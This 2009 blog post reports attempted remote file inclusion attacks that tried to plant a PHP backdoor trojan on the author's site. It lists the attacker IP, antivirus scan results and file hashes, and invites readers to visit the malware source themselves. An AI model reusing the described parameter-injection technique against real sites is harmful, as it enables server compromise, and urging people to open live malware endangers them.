Hacking Attempt Today via FoxReality

Multiple Attempts to Drop Trojan on This Website Failed

These are the Wassup details of the attack

69.65.41.165 2009-06-13 10:48:00

  • User Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
  • OS: WinVista
  • BROWSER: IE 7

As you can see SERVER[DOCUMENT ROOT]= is a part of php code and they’ve attempted to change my domain root to that of http://web.archive.org/web/20130611185214/https://www.foxreality.com/ which is part of Rupert Murdoch’s empire.

NOD32 NAC Trojan
NOD32 NAC Trojan

The hyperlinks above don’t work as the code failed. However, if you are brave, strip out the first bit and just go to as I did, and hopefully, your anti-virus or browser will kick in with a malware warning like mine did!   The malware is identified as a Trojan by my NOD32 anti-virus software as;  PHP/Small.NAC trojan

Conclusion

Someone has dumped a piece of malware on the Fox network and is now going round blogs and other websites to get them to point to the trojan and thus spread the nefarious package. It just needs one click!

As I type this, at 2009-06-13 10:51:43 I had two more attacks!!! That’s nine in the last few minutes.
Checking the web for references, I’ve found this Russian webpage where the trojan has been tested against various antivirus programs – about half don’t detect it and it’s from the end of May this year! See link, translated into English.

This is their test:

Файл test.txt получен 2009.05.27 20:52:02 (UTC)
Текущий статус: закончено Current status: finished
Результат: 16/40 (40%) Result: 16/40 (40%)
Цитата: Quote:
Антивирус Версия Обновление Результат Antivirus Version Update Result
a-squared 4.0.0.101 2009.05.27 Backdoor.PHP.Small.o!IK
AhnLab-V3 5.0.0.2 2009.05.27 HTML/Xema
AntiVir 7.9.0.168 2009.05.27 BDS/PHP.ali.1
Antiy-AVL 2.0.3.1 2009.05.27 –
Authentium 5.1.2.4 2009.05.27 –
Avast 4.8.1335.0 2009.05.27 –
AVG 8.5.0.339 2009.05.27 BackDoor.Generic_c.BTI
BitDefender 7.2 2009.05.27 Backdoor.PHP.ALI
CAT-QuickHeal 10.00 2009.05.27 –
ClamAV 0.94.1 2009.05.27 PHP.Shell-23
Comodo 1207 2009.05.27 Unclassified Malware
DrWeb 5.0.0.12182 2009.05.27 –
eSafe 7.0.17.0 2009.05.27 –
eTrust-Vet 31.6.6524 2009.05.27 –
F-Prot 4.4.4.56 2009.05.27 –
F-Secure 8.0.14470.0 2009.05.27 Exploit:PHP/Preamble.A
Fortinet 3.117.0.0 2009.05.27 –
GData 19 2009.05.27 Backdoor.PHP.ALI
Ikarus T3.1.1.57.0 2009.05.27 –
K7AntiVirus 7.10.746 2009.05.27 –
Kaspersky 7.0.0.125 2009.05.27 –
McAfee 5628 2009.05.27 –
McAfee+Artemis 5628 2009.05.27 –
McAfee-GW-Edition 6.7.6 2009.05.27 Trojan.Backdoor.PHP.ali.1
Microsoft 1.4701 2009.05.27 –
NOD32 4109 2009.05.27 PHP/Small.NAC
Norman 6.01.05 2009.05.27 –
nProtect 2009.1.8.0 2009.05.27 Backdoor.PHP.ALI
Panda 10.0.0.14 2009.05.27 –
PCTools 4.4.2.0 2009.05.21 PHP.ShellBot.M
Prevx 3.0 2009.05.27 –
Rising 21.31.21.00 2009.05.27 –
Sophos 4.42.0 2009.05.27 Troj/PHPBdoor-A
Sunbelt 3.2.1858.2 2009.05.27 –
Symantec 1.4.4.12 2009.05.27 –
TheHacker 6.3.4.3.332 2009.05.26 –
TrendMicro 8.950.0.1092 2009.05.27 –
VBA32 3.12.10.6 2009.05.27 Backdoor.PHP.Small.o
ViRobot 2009.5.27.1757 2009.05.27 –
VirusBuster 4.6.5.0 2009.05.27 PHP.ShellBot.M
Дополнительная информация Additional Information
File size: 1165 bytes
MD5…: f1a9b4e4b207cd38641061e1b72d4775
SHA1..: 33c02179e53c19e00897fb0c63501acc0a2233e8
SHA256: 0b3eef46d7111939962db133d2e75530fbb7946d92a33195ca 6b7f2e1affe43a
ssdeep: 24:kwauoGPmXvuH6dcFTGPmXvuH6dc4H6dcZ1Mpn6+YvKsLKPX VwuHENNTh:bBoC
gMQsCgMQfQu1M5XW0SNl
PEiD..: – PEiD ..: —
TrID..: File type identification TrID ..: File type identification
HyperText Markup Language (100.0%) HyperText Markup Language (100.0%)
PEInfo: – PEInfo: —
PDFiD.: – PDFiD.: —
RDS…: NSRL Reference Data Set RDS …: NSRL Reference Data Set

Needless to say I’ve blocked the source IP address now.  It was from GigeNET in Illinois, and they’ve been told!

By Strangely

Founding member of the gifted & talented band, "The Crawling Chaos" from the North-East of England.

3 comments

    1. Actually, if you check the text file without ?? marks, it looks like the script tries to read your hard drive’s contents:

      ========== “systrojan” below ========

      SysTrojan
      Wrong Place

      1. Yes, I just checked. It’s still there – you’d think Fox would do something about it!

        I tried without the ?? as you suggested but it’s just the same message with my AV as before. It blocks it super-fast before anything else happens…

        What time did you get your hits? Was it the same sort of time as me or has it just happened?

Comments are closed.